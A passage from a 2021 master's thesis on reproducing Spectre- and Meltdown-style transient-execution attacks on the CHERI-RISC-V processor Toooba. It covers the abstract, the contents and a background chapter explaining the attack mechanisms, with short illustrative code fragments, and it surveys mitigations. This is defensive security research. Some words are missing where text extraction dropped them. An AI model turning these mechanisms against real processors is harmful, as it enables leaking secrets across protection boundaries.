DEGREE PROJECT IN SCIENCE AND ENGINEERING, SECOND CYCLE, 30 CREDITS STOCKHOLM, SWEDEN 2021

Analysis of Transient-Execution Attacks on the out-of-order CHERI- RISC-V Toooba

FRANZ ANTON FUCHS

KTH ROYAL INSTITUTE OF TECHNOLOGY SCHOOL OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE Analysis of Transient-Execution Attacks on the out-of-order CHERI-RISC-V Microprocessor Toooba

FRANZ ANTON FUCHS

Master in Computer Science Date: January 27, 2021 Supervisor: Roberto Guanciale Examiner: Mads Dam School of Electrical Engineering and Computer Science Host Organisation: University of Cambridge Department of Computer Science and Technology Swedish title: Analys av transient-execution attacker på out-of-order CHERI-RISC-V mikroprocessorn Toooba ii

Analysis of Transient-Execution Attacks on the out-of-order CHERI-RISC-V Microprocessor Toooba

Copyright © 2021 by Franz Anton Fuchs

All rights reserved. No part of this work may be reproduced or used in any manner without written permission of the copyright owner except for the use of quotations. iii

Abstract

Transient-execution attacks have been deemed a large threat for microarchitec- tures through research in recent years. In this work, I reproduce and develop transient-execution attacks against RISC-V and CHERI-RISC-V microarchi- tectures. CHERI is an instruction set architecture (ISA) security extension that provides fine-grained memory protection and compartmentalisation. I con- duct transient-execution experiments for this work on Toooba – a superscalar out-of-order implementing CHERI-RISC-V. I present a new sub- class of transient-execution attacks dubbed Meltdown-CF(Capability Forgery). Furthermore, I reproduced all four major Spectre-style attacks and important Meltdown-style attacks. This work analyses all attacks and explains the out- come of the respective experiments based on architectural and microarchitec- tural decisions made by their developers. While all four Spectre-style attacks could be successfully reproduced, the cores do not appear to be vulnerable to prior Meltdown-style attacks. I find that Spectre-BTB and Spectre-RSB pose a large threat to CHERI systems as well as the newly developed transient- execution attack subclass Meltdown-CF. However, all four major Spectre-style attacks and all attacks of the Meltdown-CF subclass violate CHERI’s security model and therefore require security mechanisms to be put in place. iv

Sammanfattning

Transient-execution-attacker har utgjort ett stort hot för mikroarkitekturer i senaste årens forskning. I den här avhandlingen återskapar jag och utvecklar transient-execution-attacker mot RISC-V och CHERI-RISC-V mikroarkitek- turer. CHERI är en instruction set architecture (ISA) security extension som ger finkornig memory protection och compartmentalisation. I avhandlingen genomför jag transient-execution-experiment på Toooba – en superscalar out- of-order processor som implementerar CHERI-RISC-V. Jag presenterar en ny sorts transient-execution-attack som kallas Meltdown-CF(Capability Forge- ry). Därutöver har jag återskapat de fyra stora Spectre-style-attackerna och viktiga Meltdown-style-attacker. I avhandlingen analyserar jag dessa attac- ker och förklarar resultaten från experimenten utifrån de arkitektoniska och mikroarkitektoniska besluten tagna av respektive utvecklare. Medan de fyra Spectre-style-attackerna kunde återskapas med framgång verkar inte proces- sorkärnorna vara sårbara för tidigare Meltdown-style-attacker. Jag kom fram till att Spectre-BTB och Spectre-RSB såväl som den nya sortens transient- execution-attack Meltdown-CF utgör ett stort hot för CHERI-system. Däremot bryter de fyra stora Spectre-style-attackerna och alla attacker av Meltdown- CF-typen mot CHERI:s threat-model och kräver därmed säkerhetsmekanismer för att verkställas. v

Acknowledgements

I would like to thank:

• Simon W. Moore, my supervisor at Cambridge, who – even though the circumstances were not in our favour – believed in me and gave me the opportunity to conduct my work remotely. Furthermore, he provided lots of feedback throughout close and regular supervision sessions.

• Jonathan Woodruff, my advisor, who spent many hours explaining vari- ous concepts to me, was always happy to discuss my ideas, and provided feedback and inspirations that heavily impacted my work.

• Peter Rugg, Alexandre Joannou, Jessica Clarke, Marno van der Maas, and others who assisted me in solving a wide range of problems and made me rethink my approaches and ideas.

• Robert N. M. Watson and the entire CHERI team who warmly welcomed me into the team and created a helpful and encouraging atmosphere.

• Roberto Guanciale, my supervisor at KTH, who made it possible to con- duct this thesis work within the CHERI group and supported me through the entire by providing important high-level feedback.

Contents

1 Introduction 1 1.1 Research Question and Scope ...... 2 1.2 Contributions ...... 2 1.3 Figures and Permissions ...... 2 1.4 Outline ...... 3

2 Background 4 2.1 Microarchitectural Background ...... 4 2.1.1 RISC-V ...... 4 2.1.2 Caches and Memory ...... 6 2.1.3 Out-of-order Execution ...... 6 2.1.4 ...... 7 2.1.5 Memory Disambiguation ...... 9 2.2 Transient-Execution Attacks ...... 9 2.2.1 Spectre Attacks ...... 10 2.2.2 Meltdown Attacks ...... 13 2.2.3 Timing Side Channels ...... 15 2.3 Security Mechanisms ...... 15 2.3.1 Tagging Microarchitectural State ...... 16 2.3.2 Special Instructions ...... 16 2.4 CHERI ...... 17 2.4.1 CHERI Abstract Model ...... 17 2.4.2 CHERI-RISC-V ...... 21 2.4.3 CHERI-RISC-V Hardware ...... 22 2.4.4 CHERI Software Stack ...... 22 2.4.5 CHERI Security Model ...... 23 2.5 Related Work ...... 24

vii viii CONTENTS

3 Methods 26 3.1 Toooba ...... 26 3.2 Research Methodology ...... 28 3.3 Common Mechanisms ...... 29 3.3.1 Flushing Caches ...... 29 3.3.2 Timing Measurements ...... 30

4 RISC-V Results 32 4.1 Spectre Attacks ...... 32 4.1.1 Spectre-PHT ...... 33 4.1.2 Spectre-PHT-Write ...... 34 4.1.3 Spectre-BTB ...... 34 4.1.4 Spectre-RSB ...... 34 4.1.5 Spectre-STL ...... 35 4.2 Meltdown Attacks ...... 36 4.2.1 Meltdown-US ...... 36 4.2.2 Meltdown-GP ...... 37

5 CHERI-RISC-V Results 38 5.1 Spectre Attacks ...... 38 5.1.1 Spectre-PHT ...... 38 5.1.2 Spectre-PHT-CHERI-Write ...... 41 5.1.3 Spectre-BTB on CHERI-Sandboxes ...... 41 5.1.4 Priv-Mode Attacks ...... 45 5.1.5 Spectre-RSB ...... 46 5.1.6 Spectre-STL ...... 48 5.2 Meltdown Attacks ...... 49 5.2.1 Meltdown-US-CHERI ...... 49 5.2.2 Meltdown-GP-CHERI ...... 50 5.2.3 Meltdown-CF ...... 51

6 Discussion 58 6.1 SinglePCC ...... 58 6.1.1 Mechanism ...... 58 6.1.2 Testing SinglePCC ...... 59 6.1.3 Hardening SinglePCC ...... 60 6.1.4 Spectre-BTB in Kernel Code ...... 62 6.2 Preventing Meltdown-CF ...... 63 6.3 Ethics and Sustainability ...... 64 6.4 Future Work ...... 64 CONTENTS ix

7 Conclusions 66

Bibliography 67

A Full C Attack 73

B Full CHERI-RISC-V Attack 78 x CONTENTS

Acronyms

ABI Application Binary Interface

ALU

ASID Address Space Identifier

ASR Access System Registers

BHT Branch History Table

BOOM Berkeley Out-of-Order Machine

BTB Branch Target Buffer

CHERI Capability Hardware Enhanced RISC Instructions

CID CHERI Compartment Identifier

CISC Complex Instruction Set Computing

CSR Control and

DDC Default Data Capability

FPGA Field Programmable

FPU Floating Point Unit

HDL Hardware Description Language

ILP Instruction-Level Parallelism

IR Intermediate Representation

ISA Instruction-Set Architecture

LFB Line Fill Buffer

LLC Last Level

LSB Least Significant Bit

LSQ Load-Store Queue

MMU CONTENTS xi

MSB Most Significant Bit

PCC Program Capability

PHT Pattern History Table

PTE Page Table Entry

RAS Return Address Stack

RIDL Rogue In-Flight Data Load

RISC Reduced Instruction Set Computing

ROB Reorder Buffer

ROP Return-Oriented Programming

RSB Return Stack Buffer

SCR Special Capability Register

STL Store-To-Load

SUM Supervisor User Memory

TLB Translation Lookaside Buffer

Chapter 1

Introduction

Memory safety in general has been one of the most difficult security problems in the secure computing world. The bug gives a good example of the severity of memory safety problems and explains the need for strong memory safety [1]. One approach to mitigate these kinds of attacks is Cyclone – a dialect of C that aims to achieve memory safety [2]. Similar approaches are CCured [3] that aims to enhance type-safety of C programs and Checked C [4] that helps to guarantee spatial memory safety for C programs. Another approach to implement memory safety is in-memory capability systems, which enforce memory accesses through capabilities in place of in- teger addresses. The idea of capability systems is not new, but has existed for more than forty years, e.g., the CAP Computer [7] or Ackerman’s architecture [8]. However, capability systems have never been commercially successful. The CHERI project starting in 2010 revived the idea of capability systems and had a large impact on the field. The main idea of CHERI is to effectively ensure spatial and temporal memory safety. CHERI systems can mitigate at- tacks targeting spatial or temporal memory safety vulnerabilities. However, in January 2018, a new class of attacks was published called transient-execution attacks. These kinds of attacks had a major impact on the processor industry and pose a large threat to CHERI systems as they can circumvent the security mechanisms in place. Transient-execution attacks have partly been evaluated on RISC-V and not evaluated at all on CHERI-RISC-V systems. Therefore, the question remains whether these attacks are also possible on RISC-V and CHERI-RISC-V systems, which this thesis aims to answer.

1 2 CHAPTER 1. INTRODUCTION

1.1 Research Question and Scope

The main research question evaluated throughout the course of this thesis is: Is the out-of-order CHERI-RISC-V processor Toooba vulnerable to transient- execution attacks? In order to answer that question, I will attempt to repro- duce all major transient-execution attacks in both RISC-V and CHERI-RISC- V. This work is limited to attacks that include transiently executed instructions revealing secrets. Attacks inferring information about the program’s state, e.g., BranchScope [9] without transient execution are not part of this thesis work. Developing and implementing mitigation mechanisms is out of the scope. However, it is part of this work to point out possibilities for mechanisms that can be implemented. Furthermore, I consider it in scope to test whether ex- isting mitigation mechanisms effectively mitigate transient-execution attacks. However, it is considered out-of-scope to thoroughly test and evaluate mitiga- tion mechanisms including a performance analysis and which advantages and drawbacks each mechanism has.

1.2 Contributions

In this work, I make the following contributions:

• The first work to completely reproduce the major transient-execution attacks on a RISC-V .

• The first-ever work to reproduce the major transient-execution attacks on a CHERI-RISC-V microarchitecture.

• Development of the new subclass of Meltdown-CF attacks.

• Developing an extensible framework for exploring transient-execution attacks and creating a platform to research mitigation mechanisms in RISC-V and CHERI-RISC-V .

• Testing and hardening the SinglePCC implementation in Toooba.

1.3 Figures and Permissions

All figures with a citation are used with the permission of the publisher. Fig- ures without a citation were created by myself. CHAPTER 1. INTRODUCTION 3

1.4 Outline

In Chapter 2, I explain the background of this thesis work including modern microarchitectures, transient-execution attacks, and the CHERI-RISC-V ar- chitecture. In the next chapter, I present the research methods applied in the course of this thesis. This will be followed by Chapter 4 and Chapter 5, which give an overview of the attacks included in the framework for RISC-V and CHERI-RISC-V microarchitectures, respectively. Chapter 6 will discuss the results and their implications. The thesis will be concluded in Chapter 7. Chapter 2

Background

In this chapter, I introduce the microarchitectural background of transient- execution attacks followed by the attacks themselves. Next, I describe CHERI systems, which will be the basis for the research done throughout the thesis work.

2.1 Microarchitectural Background

Microarchitectures use sophisticated mechanisms in order to improve overall performance. In industry, the focus has been on performance, but not secu- rity. This led to the emergence of transient-execution attacks, which exploit these mechanisms. This section describes RISC-V and the microarchitectural mechanisms that build the basis for transient-execution attacks.

2.1.1 RISC-V RISC-V [10] is an extensible open-source Instruction-Set Architecture (ISA) that has received a great deal of attention in academia and is gaining traction in industry. An ISA describes an abstract model of the computer including the architectural state of the machine, instructions to change the state, regis- ters, memory access, and other input/output specifications. It is important to distinguish between the terms architecture and microarchitecture. A microar- chitecture is an implementation of an architecture. Therefore, binary compati- bility exists between microarchitectures that implement the same architecture. A program causes visible changes to the architectural state, but the microar- chitectural state is mainly invisible to the program.

4 CHAPTER 2. BACKGROUND 5

The RISC-V ISA is a Reduced Instruction Set Computing (RISC) architec- ture, which means that it aims to have a small set of instructions where each in- struction does only one task. In contrast, instructions on Complex Instruction Set Computing (CISC) architectures can do several operations within a single instruction. RISC-V has similarities to other RISC architectures, e.g., MIPS and ARM, but it differs mainly because of its modular nature. The unprivi- leged specification [11] containing information on the user-space instructions describes a minimal instruction set – the base integer instruction set – that has to be implemented on all microarchitectures and several other extensions that can be implemented. This is the reason why RISC-V is considered a design space. The RISC-V specification defines in the current unprivileged specification 13 extensions [11]. Widely implemented are the standard extensions for inte- ger multiplication and division, atomic instructions, single-precision floating- point, double-precision floating-point, and compressed instructions. RISC-V extensions are abbreviated with capital letters , e.g., A for the standard ex- tension for atomic instructions. Furthermore, RISC-V defines three different register bit widths 32, 64, and 128 bits. RISC-V have a name tag to specify which extensions and features of RISC-V they implement, e.g., RV32IACMU, where RV32 stands for RISC-V 32 bits wide and all following capital letters identify the instruction set extensions this microprocessor im- plements. The capital letter G is used to refer the general-purpose ISA, which includes the integer operations, multiplication and division operations, atomic operations, single-precision floating point operations, and double-precision floating point extensions abbreviated as "IMAFD". The RISC-V privileged specification [12] defines three privilege modes: M(achine), S(upervisor), and U(ser). One additional privilege mode might be added in the future as it is held reserved in the description. Machine mode presents the highest privilege level and user mode the lowest privilege level. Like with the basic integer instruction set, every RISC-V implementa- tion needs to implement machine mode. The implementation of other modes is an implementation choice. When supervisor mode is implemented, this is labeled with an S in the name tag. For user mode, the letter U is added to the name tag. In machine mode, addresses are interpreted as physical addresses. In supervisor mode, address translation is conducted. The main information for address translation, e.g. the Address Space Identifier (ASID), is stored in the satp register, which is the supervisor address translation and protection register. The privileged RISC-V architectures manual [12] specifies 32 bit, 39 bit, and 48 bit wide virtual addresses. 6 CHAPTER 2. BACKGROUND

Machine mode and supervisor mode define new registers for special pur- poses, which are called Control and Status Registers (CSRs) in RISC-V. These registers are used to get information about the microarchitecture, but are also used to control the architecture, e.g., trap handling. The chapters Machine- Level ISA and Supervisor-Level ISA of the privileged specification [12] contain further information on exception handling and related topics.

2.1.2 Caches and Memory DRAM access times are slow compared to the clock frequency of the proces- sor. If a load issued by the processor had to pay the full load penalty for each load operation, performance would be significantly decreased. This creates the need for low-latency memory. One solution are caches that hold the most recently accessed data. The access time to these data will be small, but ac- cess times of other data that is not stored in caches will still be large. Modern processors have multiple cache levels that differ in size, speed, and cost. The Level-1(L1) cache has the fastest access time, but is also the smallest. The cache on the highest level – also referred to as Last Level Cache (LLC) – has the slowest access time, but can store the most data. In general: The greater the level number, the slower the access times become, but the more data this cache can store. Memory is stored in the form of cache lines in caches. One cache line contains multiple adjacent memory words. Many modern processors have inclusive caches, which means that every cache line stored in a lower level is also present in every cache level above that. In modern processors, every core has its own L1 cache and the LLC – the slowest and biggest cache – is shared among all cores. The intermediate caches may be configured exclusive to a core or shared depending on the policy of the producer. Furthermore, caches are well suited for the principle of locality, which programs exhibit. Temporal locality describes the situation when a program accesses memory at the same address more than once and spatial locality is shown when the program ac- cesses memory at addresses nearby of an address already accessed. By storing the cache lines of the most recently accessed data, caches manage to improve performance for programs that exhibit both temporal and spatial locality.

2.1.3 Out-of-order Execution A microprocessor executes a program, which is defined by a sequence of in- structions as it is written by the programmer. This order of instructions de- fines the program’s behaviour and is called in-order or program-order. Sim- CHAPTER 2. BACKGROUND 7

ple microprocessors execute instruction by instruction following this order. However, modern microprocessors incorporate out-of-order execution, which means that instructions are microarchitecturally not executed in-order. This is used to enhance performance. The principle of out-of-order execution is based on the fact that instructions that do not depend on each other can be ex- ecuted in parallel and in any arbitrary order as the final result will not change. The first algorithm for full out-of-order execution has been demonstrated by Tomasulo [13]. The main goal of modern processors is to hide the latency of instructions and extract Instruction-Level Parallelism (ILP), e.g., loads and stores that miss the L1 Data cache, by executing other independent instructions in the mean- time. This increases the overall performance of the microprocessor. Out-of- order execution increases the divergence between the architectural and mi- croarchitectural state. An instruction becomes visible when it changes the architectural state. Instructions must become visible in program-order, other- wise the new state diverges from a valid architectural state, which means that a different program behaviour appears. An instruction retires – also called com- mits – in the cycle when it changes the architectural state. Instruction commits are in sequential order matching the programmer’s model presented in the ISA.

2.1.4 Speculative Execution An important performance criterion is to keep the processor’s filled at all times. The processor needs to fetch the correct instructions for that. The control-flow of a program depends on multiple parameters including user in- put. Control-flow is steered by direct and indirect branches in . A direct branch is a jump to an address that is determined by an offset of the branch instruction. An indirect branch is a jump to a value stored in a register. In order to fetch the correct instructions, the microprocessor would need to know whether a branch is taken and what its jump target is, which is is not possible though. Therefore, modern processors use branch prediction. The processor will predict the information it needs. Following its prediction, the processor will execute the instructions it thinks are correct. If the processor’s prediction turns out to be right, meaning that the predicted values match the program’s real values, the instructions can commit. Otherwise, the instruc- tions need to be rolled back. Therefore, speculative execution is not visible on the architectural level. If the microprocessor’s speculation is successful, this can lead to a large performance gain. A speculative microprocessor has special units that handle prediction. They also differ in for which kinds of branches 8 CHAPTER 2. BACKGROUND

they are responsible for prediction.

Branch Predictors Branch prediction can be either static or dynamic. A static branch predic- tor always makes the same decision and does not change during runtime of a program. On the other hand, a dynamic may change its pre- diction as it learns at runtime. I will focus on dynamic branch prediction as it is the most used technique in modern microprocessors. A branch predictor mainly consists of two sub units. The Pattern History Table (PHT) stores the history of a particular branch. Having that information, the processor predicts whether the branch is taken or not. This can be either local or global. A lo- cal PHT stores only the history, e.g., strongly taken for one branch, whereas a global PHT also takes other branches and their outcomes into account. The processor also has a Branch Target Buffer (BTB), which stores the branch tar- get, which is the location that the control-flow will go to if the branch is taken. A microprocessor can also implement both local and global PHTs and choose which one to use during runtime depending on the misprediction ratio. This is called a Tournament Predictor [14]. In most microprocessors, branch prediction covers all direct and indirect branch instructions with the exception of call and return instructions. They are handled in separate logic as presented in the paragraph below. However, instances of both instructions can also be placed in the BTB, e.g., as a mitiga- tion mechanism against attacks or because the microprocessor does not have dedicated logic for these two instructions.

Return Stack Buffers A Return Stack Buffer (RSB) – also called Return Address Stack – is a hard- ware buffer for return addresses. For every call to a function the return address is pushed to the stack. Every return instruction pops one return ad- dress. The return address is also stored on the software stack. The main goal addressed by a RSB is to enhance performance. Loading the return address from the software stack can lead to stall cycles, e.g., because the branch needs to be taken early in the pipeline and the load can only be performed later in the pipeline. Therefore, microprocessors use a RSB to predict the return address and keep the pipeline filled with instructions. In case that the addresses of the RSB and the software stack match, a performance gain is achieved. Otherwise, speculatively executed instructions need to be rolled back. CHAPTER 2. BACKGROUND 9

sd t0, 0(a0) ld t1, 0(a1)

Figure 2.1: The RISC-V store and load instructions are dependent if a0 and a1 are resolved to the same physical address.

2.1.5 Memory Disambiguation When reordering instructions the microprocessor has to ensure that it does not break any dependencies. For a store and a load operation, a true depen- dency exists if the load returns the value from memory that was written by the store operation preceding the load where both operations accessed the same address. The store and load operations shown in Figure 2.1 are dependent if a0 and a1 are resolved to the same physical address. The process of detecting true dependencies between memory operations is called memory disambigua- tion. However, at the point of reordering instructions the microprocessor might not know the full addresses yet, e.g., because they are loaded from memory and these loads have not finished yet or the register is being updated and will be made available on a forwarding path. Therefore, the microprocessor can- not guarantee that these instructions are independent. However, in order to achieve high performance goals loads have to be executed as early as possi- ble such that a possible miss penalty can be hidden. To enhance performance, modern microprocessors use memory disambiguation with speculation as first presented by Gallagher et al. [16]. The microprocessor assumes that the load is not dependent on the store and executes the load and instructions dependent on the load speculatively before the store. When the address of the store is resolved the microprocessor checks whether there in fact is a dependency and in case of that it re-executes the load and its dependent instructions.

2.2 Transient-Execution Attacks

Transient instructions are instructions that are erroneously executed by the processor due to out-of-order or speculative execution but would not have ap- peared otherwise. Transient execution is not visible on the architectural level as all transient instructions should not have been executed, are rolled back, and never commit to the architectural state. However, transient execution has ef- fects on the microarchitectural state. These state changes can be read through side channels. This is the basis of transient-execution attacks. They trick the 10 CHAPTER 2. BACKGROUND

microprocessor into executing several instructions transiently and then gain knowledge through side channels. The most used side channel for speculative attacks is timing. There exist other side channels like power consumption or heat dissipation, but in this work I will only use timing side channels. The choice to only use timing side channels is supported by all publications on transient-execution attacks as timing side channels have proved to be effec- tive [18, 19, 20]. Speculative Attacks can be subdivided into Spectre Attacks and Meltdown Attacks [19]. More sophisticated classifications [20] exist, but are not needed for this thesis work.

2.2.1 Spectre Attacks Spectre Attacks focus on microarchitectural state changes due to misprediction of control or data flow. Spectre attacks were first demonstrated by Kocher et al. [22]. They can further be subdivided into four categories regarding which part of speculative execution they seek to exploit.

Spectre-PHT Following the name, Spectre-PHT aims to attack the Pattern History Table. The basic attack principle is to train the history of a branch such that the pre- diction’s outcome follows the attackers intentions. A simple example – derived from [22] – is shown in Figure 2.2. The if statement will result in a branch instruction. The first step of the attacker is to train the PHT of this branch such that it is strongly predicted to not taken, which means that the condition will evaluate to true. This can be accomplished by calling the code with this if statement with values for the index i that are less than array_size. The next step is to conduct the actual attack. The attacker can provide any desired value for i as the branch prediction will speculatively execute the body of the if statement. Therefore, the attacker can trick the microprocessor in execut- ing an arbitrary load without checking the bounds in the first place. Using the data retrieved from the load to sec_arr as an index to a user accessible array usr_arr will change the microarchitectural state. Later, the microprocessor will detect the misprediction and roll back the instructions. However, microar- chitectural side effects have already taken place and stay visible even though none of the speculatively executed instructions committed. Spectre-PHT is also known as Spectre v1 and presented as such in [22]. CHAPTER 2. BACKGROUND 11

int j; int r = 0; if (i < array_size) { j = sec_arr[i]; r = usr_arr[j]; }

Figure 2.2: Spectre-PHT example written in C.

Spectre-BTB Opposed to Spectre-PHT, Spectre-BTB attacks the Branch Target Buffer. A BTB has only a limited number of entries. Therefore, the target address of a branch instruction has to be mapped to an entry by a hash function. In the original form as demonstrated by Kocher et al. [22] the small size of the BTB is exploited by attackers. Because of the small size of the BTB, the hash function can lead to frequent collisions. When a branch is seen by the microprocessor, it looks up the corresponding entry in the BTB and uses this target address for the prediction. As for Spectre-PHT, Spectre-BTB consists of two phases. First, the attacker injects a malicious branch target into the BTB at the entry of a branch executed by the victim program. Figure 2.3 shows two branch instructions, which I assume to be mapped to the same BTB entry. The injection can be done by executing the second branch instruction, which will overwrite the entry of the first one. In the second phase, the attacker triggers the first instruction to be executed. Speculatively, the branch target address in the BTB entry – which is the branch target of the second branch instruction – will be used and the control-flow will be speculatively directed there. This target is attacker controlled and will leak the desired information. This variant is called out-of- place Spectre-BTB. Another variant is in-place Spectre-BTB. In this case, only one branch instruction is used. The attacker manages, e.g. by user input, to poison the BTB entry of this branch instruction. The next time, the code with this branch instruction is executed, the branch prediction will direct the control-flow spec- ulatively to attacker intended code, which the attacker can use to leak informa- tion. Spectre-BTB is also known as Spectre v2 and presented as such in [22]. 12 CHAPTER 2. BACKGROUND

00000008: 00060067 jr a2

...

00001008: 00078067 jr a5

Figure 2.3: Indirect jumps mapped to the same BTB entry.

Spectre-RSB Spectre-RSB attacks were discovered later than the original Spectre attacks and aim to attack speculative execution involving the Return Stack Buffer [23, 24]. There exist multiple attacks flavours of this attack that use subtleties of a particular microarchitecture, but all have the same goal in common. Spectre- RSB attacks target a mismatch between the address on the hardware return stack and the address on the software return stack. The microprocessor will use the address in the RSB and speculatively direct the control-flow there. The attack consists of the injection phase, which changes the entry at the current index of the RSB and the side channel sending phase. This triggers side effects by speculatively returning to the injected address.

Spectre-STL Spectre- Store-To-Load (STL) differs substantially from the other Spectre at- tacks as it does not attack control-flow, but data flow. As described in Section 2.1.3, the microprocessor wants to execute load instruction as early as possible to hide the load penalty. A load instruction can pass a store instruction if they are independent. Load and store instructions are independent if their mem- ory addresses differ. However, memory addresses might not be fully available to the microprocessor when it needs to make the decision whether the load is allowed to pass. Therefore, the microprocessor speculates whether the ad- dresses are independent. Sophisticated processors have dedicated memory dis- ambiguation logic for this purpose as described in Section 2.1.5. An example of the attack is shown in Figure 2.4. The first step is to trick the microproces- sor into predicting that addr1 and addr2 are different. Then the load from addr2 will speculatively be executed before the store to addr1. In the ex- ample, the memory is overwritten with zeros at this address. The attacker can manage to speculatively read out the stale data before it is overwritten. This attack has also the name Spectre v4 and was demonstrated first by Horn [25]. CHAPTER 2. BACKGROUND 13

*addr1 = 0x00; val = *addr2;

Figure 2.4: Spectre-STL example in C.

Rogue In-Flight Data Load Rogue In-Flight Data Load (RIDL) [26] is an attack of microprocessors that use Line Fill Buffers (LFBs). A LFB is used in microprocessors in order to prevent caches from blocking when a miss occurs. In order to achieve high performance goals, microprocessors speculatively use in flight store data for loads without checking permissions in the first step. A store is in flight, when it is currently in the LFB, but not has not committed yet, e.g., due to a cache miss. Another process running on the same hardware can observe this in-flight store by performing a random load and leak its value through a side channel. The general attack idea is as follows: A victim process performs a memory access to secret data. This memory access will be handled via LFBs and an entry holding the secret data will be allocated. Next, an attacker per- forms a memory access, which will be speculatively satisfied by an LFB entry. This returns the secret data to the attacker who uses it as an index to a buffer. This will load a line into the caches and therefore reveals the secret value to the attacker. Eventually, the processor will roll back the execution because of misspeculation, but the effects to the cache will remain. With this attack, one can leak entire pages from another running process.

2.2.2 Meltdown Attacks Meltdown attacks focus on microarchitectural state changes due to transient execution of instructions following a faulting instruction. Therefore, Melt- down attacks do not attack branch prediction features of the microprocessor, but out-of-order execution. They also rely on at which point access rights are checked and hardware exceptions are thrown.

Meltdown-US The original Meltdown attack – demonstrated by Lipp et al. [27] – seeks to access a page for supervisor use only from user space. Therefore, this attack is also called Meltdown-US – User/Supervisor. The goal of the attack is to read out supervisor-only memory without having sufficient privilege level for that. The attack exploits that the protection domain privilege is not checked 14 CHAPTER 2. BACKGROUND

when actually accessing the page, but in later pipeline stages. Eventually this instruction will fault and raise a hardware exception, but in the meantime tran- siently executed instructions following the faulting instruction will reveal the sought value through side channels. By conducting this attack multiple times, an attacker can read out the entire kernel of an operating system [27].

Foreshadow Attacks Van Bulck et al. presented [28], which has the same goal as Meltdown-US – reading out data without having permission to do so. How- ever, Foreshadow is targeting SGX enclaves [29] and exploits a different mechanism than Meltdown. Foreshadow is tailored to microprocessors that do not allow large speculation windows and where the data to be leaked must reside in the L1 cache. However, it is possible to access the L1 cache specula- tively even though access is denied. This is caused by the fact that data access and permission control is conducted in parallel in an exploitable microproces- sor [30]. Therefore, even though access is denied the value is fetched into a register and can be leaked through a side channel. Later, Weisse et al. [31] presented Foreshadow-NG, which is an extension of Foreshadow that allows to break operating system or hypervisor abstraction.

Meltdown-GP The GP – General Protection – variant of Meltdown enables an attacker to access privileged system registers. When accessing a system register, the mi- croprocessor will check whether the current privilege is sufficient to access it. If this is not the case, an exception will be thrown. Meltdown-GP exploits that some microarchitectures throw the exception late or allow computation on the system register value before stopping executing the instruction sequence. This allows the attacker to leak the the system register’s value due to a side channel. This attack has erroneously been named as Spectre v3a in early documents [32, 33].

Meltdown-RW Meltdown-US demonstrated that supervisor memory can be read out without sufficient privilege level. Kiriansky and Waldspurger [34] introduced a new attack initially called Spectre v1.2. This attack seeks to write to pages that are marked as read-only. The functioning of this attack is similar to Meltdown- US. The attacker writes to the read-only page and other transient instructions CHAPTER 2. BACKGROUND 15

follow until the exception is thrown by the processor. The difference is that the transient executions are in another process. The speculative write of one pro- cess will trick another process to leak secret information. Following Canella et al. [19], this attack uses a transient-execution sequence after a faulting in- struction. Therefore, it is referred to as Meltdown-RW – Read/Write.

2.2.3 Timing Side Channels Measuring how long a certain instruction sequence needs to execute is a well- known and often used side channel. The attacker measures the execution time and compares it to a reference time. Based on that, the attacker decides which information has been gained. Any sequence of instructions can be used for timing measurements in theory, but in practice only instruction sequences that generate measurement results such that the execution times of different runs deviate significantly are used. Often the access time of load operations is taken. A load will commit earlier in time if it hits a cache and therefore de- crease the overall execution time. In the other case, the load will have to go to the DRAM and the execution time will be longer. Most transient-execution attacks demonstrated up to now use the FLUSH+RELOAD [18] attack. Here, the attacker flushes the Last Level Cache (LLC), which is shared between all cores. Next, the victim will run and load at least one cache line based on the secrets it computes on. After the victim has been executed, the attacker reloads an entire buffer. If certain loads are faster than others, the attacker knows that the victim has accessed the corresponding cache line of the load. This allows the attacker leak the secret value the victim computed on.

2.3 Security Mechanisms

In order to mitigate transient-execution attacks, academia and industry has come up with many security mechanisms. The first generation of security mechanisms was on the software side as they could be easily and quickly de- ployed. Next, many hardware mechanisms were proposed and implemented in the following generation of microarchitectures. In this section, I summarise the most important principles of hardware-based mitigation mechanisms. An- other mitigation mechanism – SinglePCC – will be explained in Section 6.1. 16 CHAPTER 2. BACKGROUND

2.3.1 Tagging Microarchitectural State A class of mitigation mechanisms is to tag parts of the microarchitecture with special values. Tagging parts of the microarchitecture prevents sharing mi- croarchitectural state between protection domains that are not supposed to share information with each other. For CHERI systems, the CHERI Compart- ment Identifier (CID) is a tagging mitigation mechanism that has originally been presented by Watson et al. [21]. A CID is an integer that uniquely iden- tifies a compartment and is held in hardware. The idea is to add a field to each BTB entry that is big enough to hold the CID. When a prediction is made in the processor, the CID of the compartment currently running on the core is compared to the respective entry of the BTB. If they match, the prediction will be deemed trustworthy and the core will speculatively jump to the target. Otherwise, the core will throw away the prediction results and will wait until the jump target has been successfully resolved. Similar changes have to be made for predictions coming from the RSB. The CID mechanism successfully stops attacks that want to cross protec- tion domains. A good example of an attack being mitigated is the attack on sandboxes as it is described in Section 5.1.3. Tagging microarchitectural state has also been adopted by industry, e.g., by Arm in the introduction of Arm v8.5-A. The approach applied by Arm is to tag its microarchitecture and also have special registers that either allow or disallow to use branch prediction results from one context in another context. This has been implemented in multiple processors, for example, the Cortex-A77 [36].

2.3.2 Special Instructions Another option to mitigate transient-execution attacks is to give the users con- trol of how much they want to share with other compartments. This can be done by changing the ISA and adding new instructions. This puts the user or in charge of what can be microarchitecturally visible to other com- partments operating on the same system. The following paragraphs discuss several instructions that could be added and what influence they have. One option is to flush the caches or part of them. Whenever a context- is conducted, the operating system can flush all caches. This will effec- tively mitigate all attacks presented in the Chapters 4 and 5 as the secret cannot be recovered by timing measurements. Neither RISC-V nor CHERI-RISC-V offer a flush instruction yet [11, 12, 37]. However, this does not solve the problem of transient-execution attacks themselves as the transient-execution sequence still happens – its effects are simply cleaned up. However, attack- CHAPTER 2. BACKGROUND 17

ers may be able to find another side channel and use it to recover the secret. Moreover, the performance penalty by regularly clearing the caches is cost prohibitive in a system. Furthermore, it might be an option to add instructions to enable flushing of microarchitectural state, e.g., flushing the branch prediction unit. This ef- fectively mitigates cross protection domain training and entry injection. How- ever, it does not prevent attacks that work by finding a gadget in the victim domain and this gadget then revealing a secret. Another option is to disable entire microarchitectural units. This implies performance penalties, but effec- tively mitigates attacks through a specific microarchitectural unit, e.g., Arm offers to completely disable memory disambiguation and therefore preventing Spectre-STL attacks [36]. Another class of instructions that is often used in microarchitectures is barriers [33, 36]. Barriers – also called fences – do not allow instructions being executed out-of-order or in speculation to pass them and therefore enable software to make critical parts of its code secure. For ex- ample, Arm introduces the Barrier that works by not letting speculative loads pass previous stores to the same virtual address [36].

2.4 CHERI

